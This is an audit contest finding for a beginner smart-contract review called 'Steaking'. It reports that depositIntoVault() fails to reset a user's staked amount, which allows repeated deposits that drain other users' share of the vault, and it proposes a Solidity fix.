First Flight #22: Steaking
First Flight #22
Beginner FriendlyFoundryDeFi
100 EXP
View results
Previous Next
Submission Details
Severity: high
Valid

The depositIntoVault function allow user to call more than once

znohat

Summary

The depositIntoVault() function allow user to call more than once. Making lost of vault shares for other users.

Vulnerability Details

depositIntoVault() function deposits ETH into Steak Vault without reset user's stakedAmount

Since the state of the contract does not change after calling this function, user can call this function again and get more shares.

Impact

User can abuse this function to get more shares for them.
Since the contract ETH balance is reduced each time depositIntoVault is called, other users will not be able to deposit in to vault if their staked amount greater than the current contract balanace. This made lost of vault shares for them.

Tools Used

Manual review

Recommendations

Reset user staked amount to 0 before deposit to vault.

usersToStakes[msg.sender] = 0;
IWETH(WETH).deposit{value: stakedAmount}();
IWETH(WETH).approve(vault, stakedAmount);
uint256 sharesReceived = IWETHSteakVault(vault).deposit(
stakedAmount,
msg.sender
);
Updates

Lead Judging Commences

inallhonesty Lead Judge 11 months ago
Submission Judgement Published
Validated
Assigned finding tags:

`Steaking:depositIntoVault` fails to update the users balance allowing contract draining to repeat call

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.